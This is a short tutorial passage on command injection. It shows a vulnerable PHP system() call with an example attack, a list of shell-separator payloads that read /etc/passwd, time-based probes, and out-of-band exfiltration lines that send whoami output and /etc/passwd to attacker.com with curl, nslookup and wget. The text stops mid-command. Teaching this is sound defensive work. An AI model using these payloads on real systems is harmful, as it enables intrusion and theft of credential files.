Key Takeaways
- Command injection = RCE on server
- Avoid system() functions with user input
- Blind injection detectable via timing/OOB
- Critical severity - immediate server compromise
Contents
1. What is Command Injection?
Command injection occurs when an application passes user-controlled data to a system shell. Attackers can inject additional commands that execute with the application's privileges.
Vulnerable Code
# PHP (vulnerable)
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
# Attack: ?ip=8.8.8.8; cat /etc/passwd
# Executes: ping -c 4 8.8.8.8; cat /etc/passwd2. Injection Payloads
# Command separators (Linux)
; # Command terminator
| # Pipe
|| # OR (runs if first fails)
& # Background
&& # AND (runs if first succeeds)
`cmd` # Command substitution
$(cmd) # Command substitution
# Examples
; id
| id
|| id
& id
&& id
`id`
$(id)
; whoami
| cat /etc/passwd3. Blind Command Injection
# Time-based detection
; sleep 10
| sleep 10
# Out-of-band exfiltration
; curl attacker.com/?data=$(whoami)
; nslookup $(whoami).attacker.com
; wget http://attacker.com/$(cat /etc/passwd | base64)
# Write to web directory
; echo "